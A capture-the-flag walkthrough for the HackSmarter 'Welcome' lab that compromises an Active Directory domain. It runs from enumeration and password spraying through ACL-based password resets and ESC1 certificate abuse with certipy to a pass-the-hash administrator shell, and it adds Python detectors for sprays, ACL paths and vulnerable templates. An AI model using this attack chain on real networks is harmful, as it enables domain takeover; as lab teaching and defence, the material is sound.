# Welcome (Easy) - HackSmarter

<figure><img src="/files/lNCp3ysc7D9aAhH4pmNy" alt=""><figcaption></figcaption></figure>

### Objective / Scope <a href="#user-content-objective--scope" id="user-content-objective--scope"></a>

You are a member of the Hack Smarter Red Team. During a phishing engagement, you were able to retrieve credentials for the client's Active Directory environment. Use these credentials to enumerate the environment, elevate your privileges, and demonstrate impact for the client.

**Starting Credentials**

```
e.hills:Il0vemyj0b2025!
```

## Enumeration / Scanning

```
nmap -p- -vvv --min-rate 1000 10.1.37.211

53/tcp    open  domain         syn-ack ttl 126
135/tcp   open  msrpc          syn-ack ttl 126
139/tcp   open  netbios-ssn    syn-ack ttl 126
445/tcp   open  microsoft-ds   syn-ack ttl 126
593/tcp   open  http-rpc-epmap syn-ack ttl 126
636/tcp   open  ldapssl        syn-ack ttl 126
3389/tcp  open  ms-wbt-server  syn-ack ttl 126
```

```
nmap -p53,135,139,445,593,636,3389 -sC -sV 10.1.37.211

PORT     STATE SERVICE       VERSION
53/tcp   open  domain        Simple DNS Plus
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp  open  microsoft-ds?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: WELCOME.local0., Site: Default-First-Site-Name)
|_ssl-date: 2026-04-19T06:51:46+00:00; -7h04m15s from scanner time.
| ssl-cert: Subject: commonName=DC01.WELCOME.local
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.WELCOME.local
| Not valid before: 2025-09-13T16:39:47
|_Not valid after:  2026-09-13T16:39:47
3389/tcp open  ms-wbt-server Microsoft Terminal Services
|_ssl-date: 2026-04-19T06:51:46+00:00; -7h04m15s from scanner time.
| rdp-ntlm-info:
|   Target_Name: WELCOME
|   NetBIOS_Domain_Name: WELCOME
|   NetBIOS_Computer_Name: DC01
|   DNS_Domain_Name: WELCOME.local
|   DNS_Computer_Name: DC01.WELCOME.local
|   DNS_Tree_Name: WELCOME.local
|   Product_Version: 10.0.20348
|_  System_Time: 2026-04-19T06:51:04+00:00
| ssl-cert: Subject: commonName=DC01.WELCOME.local
| Not valid before: 2026-04-18T06:45:47
|_Not valid after:  2026-10-18T06:45:47
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows
```

* Add a hosts entry for the domain and DC to `/etc/hosts`

<figure><img src="/files/7A24N55VAVShSpaf2IA1" alt=""><figcaption></figcaption></figure>

### Verify The Creds

```
nxc smb 10.1.37.211 -u e.hills -p 'Il0vemyj0b2025!'
```

<figure><img src="/files/cFABMkrL0ca0gvs15Iag" alt=""><figcaption></figcaption></figure>

### Enumerating the usernames

```
nxc smb 10.1.37.211 -u e.hills -p 'Il0vemyj0b2025!' --users-export usernames
```

<figure><img src="/files/SJm6jw77sliuXU1EFz6l" alt=""><figcaption></figcaption></figure>

### Enumerating Shares

```
nxc smb 10.1.37.211 -u e.hills -p 'Il0vemyj0b2025!' --shares
```

<figure><img src="/files/tTcl8aj5KKyGmCEf4KQf" alt=""><figcaption></figcaption></figure>

* Let's crawl through all these shares using the `spider_plus` module in nxc

```
nxc smb 10.1.37.211 -u e.hills -p 'Il0vemyj0b2025!' -M spider_plus
```

<figure><img src="/files/EYsbZnBKY8z1LTRLBSLB" alt=""><figcaption></figcaption></figure>

```
cat /home/l1nuxkid/.nxc/modules/nxc_spider_plus/10.1.37.211.json  | jq .
```

<figure><img src="/files/FowviPQ1fGn169puyRKg" alt=""><figcaption></figcaption></figure>

* There are 4 PDFs in the `Human Resources` share. Let's download these files to our local Kali machine and analyze them.

```
smbclient //10.1.37.211/'Human Resources' -U 'e.hills%Il0vemyj0b2025!'
prompt off
recurse on
mget *
```

<figure><img src="/files/pwwfoN0PaAjeb1JGgbk3" alt=""><figcaption></figcaption></figure>

* Opening one of the PDF files prompted for a password, so the PDF is password protected and we need to crack the password.

<figure><img src="/files/cRgwNUagbH1mqaZcJJ1n" alt=""><figcaption></figcaption></figure>

### Cracking the PDF password using john

```
pdf2john Welcome\ Start\ Guide.pdf > pdf.hash
```

```
john pdf.hash --wordlist=/usr/share/wordlists/rockyou.txt
```

<figure><img src="/files/PnOFT9hH16RsCJFDqKkh" alt=""><figcaption></figcaption></figure>

Now, opening the PDF, we can see that it contains a new password.

<figure><img src="/files/qQZvRtFa54PGWBQrc2qh" alt=""><figcaption></figcaption></figure>

### Password Spray

```
nxc ldap 10.1.37.211 -u usernames -p 'Welcome2025!@' --continue-on-success
```

<figure><img src="/files/0QwG2gXHYekNl85AKFa9" alt=""><figcaption></figcaption></figure>
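From the defender's side, a spray like the one above (one password tried against the exported user list) shows up on the domain controller as failed logons for many different accounts from one source in a short window, each account failing only once. The following is an added example, not part of the original writeup: a small detector over constructed logon events that flags any source address failing against a threshold of distinct accounts inside a sliding window, and also reports which accounts that source then logged in as. The source addresses, the `j.doe` account and the timestamps are constructed; the other account names are the ones enumerated above.

```python
"""Detect a password spray from Windows logon events (added example)."""
from collections import defaultdict
from datetime import datetime, timedelta
from typing import Dict, List, Tuple

# Event IDs that represent a failed authentication on a DC:
# 4625 = failed logon (NTLM / LDAP bind), 4771 = Kerberos pre-auth failure.
FAILURE_IDS = {4625, 4771}
SUCCESS_ID = 4624

Event = Tuple[str, int, str, str]  # (timestamp, event id, target user, source IP)

# Constructed sample events (not real logs from the lab).
SAMPLE_EVENTS: List[Event] = [
    # one source, six accounts in ~25 seconds, one of them succeeding
    ("2026-04-19T06:50:00", 4625, "e.hills",       "10.1.37.50"),
    ("2026-04-19T06:50:05", 4624, "a.harris",      "10.1.37.50"),
    ("2026-04-19T06:50:10", 4625, "i.park",        "10.1.37.50"),
    ("2026-04-19T06:50:15", 4625, "svc_ca",        "10.1.37.50"),
    ("2026-04-19T06:50:20", 4625, "svc_web",       "10.1.37.50"),
    ("2026-04-19T06:50:25", 4771, "administrator", "10.1.37.50"),
    # one user mistyping their own password: many failures, one account
    ("2026-04-19T07:10:00", 4625, "j.doe", "10.1.37.80"),
    ("2026-04-19T07:10:07", 4625, "j.doe", "10.1.37.80"),
    ("2026-04-19T07:10:15", 4625, "j.doe", "10.1.37.80"),
    ("2026-04-19T07:10:40", 4624, "j.doe", "10.1.37.80"),
]


def detect_spray(events: List[Event], window_seconds: int = 300,
                 user_threshold: int = 5) -> Dict[str, Dict[str, List[str]]]:
    """Return {source_ip: {"failed_users": [...], "succeeded_users": [...]}}
    for every source whose failures touch >= user_threshold distinct accounts
    inside any window of window_seconds."""
    per_source: Dict[str, List[Tuple[datetime, int, str]]] = defaultdict(list)
    for ts, event_id, user, src in events:
        per_source[src].append((datetime.fromisoformat(ts), event_id, user.lower()))

    window = timedelta(seconds=window_seconds)
    hits: Dict[str, Dict[str, List[str]]] = {}
    for src, evs in per_source.items():
        evs.sort()
        failures = [(t, u) for t, eid, u in evs if eid in FAILURE_IDS]
        start = 0
        flagged = False
        # sliding window over the time-ordered failures of this source
        for end in range(len(failures)):
            while failures[end][0] - failures[start][0] > window:
                start += 1
            if len({u for _, u in failures[start:end + 1]}) >= user_threshold:
                flagged = True
                break
        if flagged:
            hits[src] = {
                "failed_users": sorted({u for _, u in failures}),
                # successes from a spraying source are the accounts to reset first
                "succeeded_users": sorted({u for _, eid, u in evs if eid == SUCCESS_ID}),
            }
    return hits


if __name__ == "__main__":
    for src, detail in detect_spray(SAMPLE_EVENTS).items():
        print(f"spray from {src}: failed={detail['failed_users']} "
              f"succeeded={detail['succeeded_users']}")
```

The single-user source is not reported even though it fails more often than any one sprayed account, which is the distinction between a spray and a brute force; tune `user_threshold` and `window_seconds` to the size of the directory and the lockout policy.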

### Shell as a.harris

```
nxc winrm dc01 -u a.harris -p 'Welcome2025!@'
```

<figure><img src="/files/3vvphO7UBuwS2GY5l1t2" alt=""><figcaption></figcaption></figure>

`user.txt`

<figure><img src="/files/WSI2yvyVJfhY6q4LKkFI" alt=""><figcaption></figcaption></figure>

### Collecting BloodHound data

```
*Evil-WinRM* PS C:\Users\a.harris\Desktop> upload ~/Tools/SharpHound.exe .
```

The firewall blocks our script, so we collect the BloodHound data remotely with nxc instead:

```
nxc ldap 10.1.37.211 -u a.harris -p 'Welcome2025!@' --bloodhound --collection all --dns-server 10.1.37.211
```

<figure><img src="/files/lOtBAeXG82tpcpMDE6Sy" alt=""><figcaption></figcaption></figure>

Looking at the ACLs, we have `GenericAll` over `I.PARK`.

<figure><img src="/files/MT5xedwGt5ds7MS0KVWm" alt=""><figcaption></figcaption></figure>

```
net rpc password "I.PARK" "l1nuxkid@123" -U "WELCOME.local"/"a.harris"%'Welcome2025!@' -S 10.1.37.211
```

And the I.PARK user has `ForceChangePassword` over `SVC_CA` and `SVC_WEB`.

<figure><img src="/files/7TU7JLy82sGwad6EM1dd" alt=""><figcaption></figcaption></figure>

```
net rpc password "svc_ca" "l1nuxkid@123" -U "WELCOME.local"/"I.PARK"%'l1nuxkid@123' -S 10.1.37.211
```

We changed the password of `svc_ca`. The `ca` suffix suggests certificate authority, and BloodHound also shows that `svc_ca` is a member of the Certificate Publishers group, so let's run certipy.
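The chain just walked (`a.harris` -> `I.PARK` -> `SVC_CA` -> Cert Publishers) is exactly what BloodHound draws; the added example below, which is not from the writeup or from BloodHound, reproduces the idea on a small edge list so the chain can be checked programmatically and, from the defender's side, every principal that can take over a given account can be listed for remediation. The edges are the rights found above; the `e.hills` `ReadProperty` edge is constructed for contrast, and the set of rights treated as control edges is an assumption of this example.

```python
"""Trace ACL control paths between AD principals (added example)."""
from collections import deque
from typing import Dict, List, Optional, Tuple

Edge = Tuple[str, str, str]  # (holder, right, target)

# Rights that give the holder control of the target, plus MemberOf, which
# gives the member whatever the group holds. Read-only rights do not qualify.
TRAVERSABLE = {"GenericAll", "GenericWrite", "WriteDacl", "WriteOwner", "Owns",
               "ForceChangePassword", "AddMember", "MemberOf"}

# Edges from the writeup, plus one constructed non-control edge.
EDGES: List[Edge] = [
    ("a.harris", "GenericAll", "I.PARK"),
    ("I.PARK", "ForceChangePassword", "SVC_CA"),
    ("I.PARK", "ForceChangePassword", "SVC_WEB"),
    ("SVC_CA", "MemberOf", "Cert Publishers"),
    ("e.hills", "ReadProperty", "I.PARK"),   # constructed: read-only, not control
]


def _adjacency(edges: List[Edge], reverse: bool = False) -> Dict[str, List[Tuple[str, str]]]:
    """Build holder -> [(right, target)] (or target -> [(right, holder)] when
    reverse=True) keeping only control edges; names are case-folded."""
    adj: Dict[str, List[Tuple[str, str]]] = {}
    for holder, right, target in edges:
        if right not in TRAVERSABLE:
            continue
        h, t = holder.lower(), target.lower()
        if reverse:
            adj.setdefault(t, []).append((right, h))
        else:
            adj.setdefault(h, []).append((right, t))
    return adj


def control_path(edges: List[Edge], source: str, target: str) -> Optional[List[Edge]]:
    """Shortest chain of control edges from source to target, or None."""
    adj = _adjacency(edges)
    source, target = source.lower(), target.lower()
    parent: Dict[str, Optional[Edge]] = {source: None}   # node -> edge that reached it
    queue = deque([source])
    while queue:
        node = queue.popleft()
        if node == target:
            path: List[Edge] = []
            while parent[node] is not None:
                edge = parent[node]
                path.append(edge)
                node = edge[0]
            return path[::-1]
        for right, nxt in adj.get(node, []):
            if nxt not in parent:
                parent[nxt] = (node, right, nxt)
                queue.append(nxt)
    return None


def principals_controlling(edges: List[Edge], target: str) -> List[str]:
    """Every principal with some control path to target (reverse BFS)."""
    radj = _adjacency(edges, reverse=True)
    target = target.lower()
    seen = {target}
    queue = deque([target])
    while queue:
        node = queue.popleft()
        for _, prev in radj.get(node, []):
            if prev not in seen:
                seen.add(prev)
                queue.append(prev)
    seen.discard(target)
    return sorted(seen)


if __name__ == "__main__":
    for holder, right, tgt in control_path(EDGES, "a.harris", "Cert Publishers") or []:
        print(f"{holder} --{right}--> {tgt}")
    print("can take over svc_ca:", principals_controlling(EDGES, "svc_ca"))
```

`principals_controlling` is the remediation list: any name in it that is not an admin group is an ACE (or group membership) that should be removed or justified.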

### Certificate Attacks (ADCS)

```
certipy-ad find -u svc_ca -p 'l1nuxkid@123' -target welcome.local -text -stdout -vulnerable

Certificate Authorities
  0
    CA Name                             : WELCOME-CA
    DNS Name                            : DC01.WELCOME.local
    Certificate Subject                 : CN=WELCOME-CA, DC=WELCOME, DC=local
    Certificate Serial Number           : 6E7A025A45F4E6A14E1F08B77737AFD9
    Certificate Validity Start          : 2025-09-13 16:39:33+00:00
    Certificate Validity End            : 2030-09-13 16:49:33+00:00
    Web Enrollment
      HTTP
        Enabled                         : False
      HTTPS
        Enabled                         : False
    User Specified SAN                  : Disabled
    Request Disposition                 : Issue
    Enforce Encryption for Requests     : Enabled
    Active Policy                       : CertificateAuthority_MicrosoftDefault.Policy
    Permissions
      Owner                             : WELCOME.LOCAL\Administrators
      Access Rights
        ManageCa                        : WELCOME.LOCAL\Administrators
                                          WELCOME.LOCAL\Domain Admins
                                          WELCOME.LOCAL\Enterprise Admins
        ManageCertificates              : WELCOME.LOCAL\Administrators
                                          WELCOME.LOCAL\Domain Admins
                                          WELCOME.LOCAL\Enterprise Admins
        Enroll                          : WELCOME.LOCAL\Authenticated Users
Certificate Templates
  0
    Template Name                       : Welcome-Template
    Display Name                        : Welcome-Template
    Certificate Authorities             : WELCOME-CA
    Enabled                             : True
    Client Authentication               : True
    Enrollment Agent                    : False
    Any Purpose                         : False
    Enrollee Supplies Subject           : True
    Certificate Name Flag               : EnrolleeSuppliesSubject
    Enrollment Flag                     : PublishToDs
    Extended Key Usage                  : Server Authentication
                                          Client Authentication
    Requires Manager Approval           : False
    Requires Key Archival               : False
    Authorized Signatures Required      : 0
    Schema Version                      : 2
    Validity Period                     : 1 year
    Renewal Period                      : 6 weeks
    Minimum RSA Key Length              : 2048
    Template Created                    : 2025-09-14T03:12:52+00:00
    Template Last Modified              : 2025-10-30T02:19:35+00:00
    Permissions
      Enrollment Permissions
        Enrollment Rights               : WELCOME.LOCAL\svc ca
                                          WELCOME.LOCAL\Domain Admins
                                          WELCOME.LOCAL\Enterprise Admins
      Object Control Permissions
        Owner                           : WELCOME.LOCAL\Administrator
        Full Control Principals         : WELCOME.LOCAL\Domain Admins
                                          WELCOME.LOCAL\Enterprise Admins
        Write Owner Principals          : WELCOME.LOCAL\Domain Admins
                                          WELCOME.LOCAL\Enterprise Admins
        Write Dacl Principals           : WELCOME.LOCAL\Domain Admins
                                          WELCOME.LOCAL\Enterprise Admins
        Write Property Enroll           : WELCOME.LOCAL\Domain Admins
                                          WELCOME.LOCAL\Enterprise Admins
    [+] User Enrollable Principals      : WELCOME.LOCAL\svc ca
```

<figure><img src="/files/orPNoXuRdqrYVvuttVCh" alt=""><figcaption></figcaption></figure>

### ESC 1

To perform the ESC1 certificate attack we need the following:

* Domain SID
* FQDN
* Certificate Authority (CA) name
* Template name
* UPN: administrator
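What makes `Welcome-Template` an ESC1 target is visible in the certipy output above: the template is enabled, carries a client-authentication EKU, lets the enrollee supply the subject, needs no manager approval or authorized signature, and grants enrollment rights to the low-privileged `svc ca` account. The following added example, not part of the writeup or of certipy, parses certipy's `-text` dump and applies those checks to every template, so a defender can run it over a full `find` dump and get the list of templates to fix. The sample input is the template section from above trimmed to the fields used, plus a constructed `Hardened-Template` that shows which conditions fail; the set of admin-group suffixes treated as privileged is an assumption.

```python
"""Audit certipy `find -text` output for the ESC1 preconditions (added example)."""
import re
from typing import Dict, List

# Sample input: the writeup's template trimmed to the fields used, plus a
# constructed hardened template for contrast.
CERTIPY_TEXT = r"""
Certificate Templates
  0
    Template Name                       : Welcome-Template
    Enabled                             : True
    Client Authentication               : True
    Enrollee Supplies Subject           : True
    Requires Manager Approval           : False
    Authorized Signatures Required      : 0
    Extended Key Usage                  : Server Authentication
                                          Client Authentication
    Permissions
      Enrollment Permissions
        Enrollment Rights               : WELCOME.LOCAL\svc ca
                                          WELCOME.LOCAL\Domain Admins
                                          WELCOME.LOCAL\Enterprise Admins
  1
    Template Name                       : Hardened-Template
    Enabled                             : True
    Client Authentication               : True
    Enrollee Supplies Subject           : False
    Requires Manager Approval           : True
    Authorized Signatures Required      : 0
    Extended Key Usage                  : Client Authentication
    Permissions
      Enrollment Permissions
        Enrollment Rights               : WELCOME.LOCAL\Domain Users
"""

# Assumption: enrollment by these groups is expected; anyone else is low-privileged.
PRIVILEGED_SUFFIXES = ("\\Domain Admins", "\\Enterprise Admins",
                       "\\Administrators", "\\Administrator")
FIELD_RE = re.compile(r"^(\s*)(.+?)\s+:\s*(.*)$")


def parse_templates(text: str) -> Dict[str, Dict[str, List[str]]]:
    """Parse the 'Certificate Templates' section into {name: {field: [values]}}.
    Lines without ' : ' that are indented deeper than the last field are
    continuation values; otherwise they are section headers."""
    templates: Dict[str, Dict[str, List[str]]] = {}
    current = None
    last_key, last_indent = None, 0
    in_templates = False
    for raw in text.splitlines():
        if not raw.strip():
            continue
        if raw.startswith("Certificate Templates"):
            in_templates = True
            continue
        if not in_templates:
            continue
        if re.fullmatch(r"\s*\d+", raw):          # "  0": next template
            current, last_key = {}, None
            continue
        if current is None:
            continue
        indent = len(raw) - len(raw.lstrip())
        m = FIELD_RE.match(raw)
        if m:
            key, value = m.group(2), m.group(3).strip()
            current.setdefault(key, [])
            if value:
                current[key].append(value)
            last_key, last_indent = key, indent
            if key == "Template Name":
                templates[value] = current
        elif last_key is not None and indent > last_indent:
            current[last_key].append(raw.strip())   # continuation of a multi-value field
        else:
            last_key = None                          # header such as "Permissions"
    return templates


def _first(tpl: Dict[str, List[str]], field: str) -> str:
    vals = tpl.get(field) or [""]
    return vals[0]


def audit_esc1(text: str) -> Dict[str, dict]:
    """Return {template: {"esc1": bool, "unmet": [...], "low_priv_enrollers": [...]}}."""
    results: Dict[str, dict] = {}
    for name, tpl in parse_templates(text).items():
        eku = tpl.get("Extended Key Usage", [])
        checks = {
            "enabled": _first(tpl, "Enabled") == "True",
            "authentication EKU": _first(tpl, "Client Authentication") == "True"
                                  or "Any Purpose" in eku or not eku,
            "enrollee supplies subject": _first(tpl, "Enrollee Supplies Subject") == "True",
            "no manager approval": _first(tpl, "Requires Manager Approval") == "False",
            "no authorized signatures": _first(tpl, "Authorized Signatures Required") == "0",
        }
        low_priv = [p for p in tpl.get("Enrollment Rights", [])
                    if not p.endswith(PRIVILEGED_SUFFIXES)]
        checks["low-privileged enrollment"] = bool(low_priv)
        results[name] = {
            "esc1": all(checks.values()),
            "unmet": sorted(k for k, v in checks.items() if not v),
            "low_priv_enrollers": low_priv,
        }
    return results


if __name__ == "__main__":
    for name, r in audit_esc1(CERTIPY_TEXT).items():
        print(name, "ESC1" if r["esc1"] else "ok", r["unmet"], r["low_priv_enrollers"])
```

Any one unmet condition breaks ESC1, which is also the fix list: requiring manager approval or removing `EnrolleeSuppliesSubject` on `Welcome-Template`, or dropping `svc ca` from its enrollment rights, each closes the path on its own.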

```
nxc ldap welcome.local -u svc_ca -p l1nuxkid@123 --get-sid
```

<figure><img src="/files/58n6ezHHL9A9x2BeIImR" alt=""><figcaption></figcaption></figure>

```
certipy-ad req -u 'svc_ca' -p 'l1nuxkid@123' -dc-ip '10.1.37.211' -target 'dc01.welcome.local' -ca 'WELCOME-CA' -template 'Welcome-Template' -upn 'administrator@welcome.local' -sid 'S-1-5-21-141921413-1529318470-1830575104-500'
```

<figure><img src="/files/1n2rdAWyqSYbMkVpo2Rp" alt=""><figcaption></figcaption></figure>

Now it's time to authenticate with the issued certificate as administrator with a single command:

```
certipy-ad auth -pfx administrator.pfx -dc-ip 10.1.37.211
```

<figure><img src="/files/gB0dvdKtYWAEnDAbBOwb" alt=""><figcaption></figcaption></figure>

### Shell as administrator using pass-the-hash

```
evil-winrm -i welcome.local -u 'administrator' -H 0cf1b799460a39c852068b7c0574677a
```

<figure><img src="/files/lpbdXImRlY1BzVTtw53M" alt=""><figcaption></figcaption></figure>

```
type ../Desktop/*
```
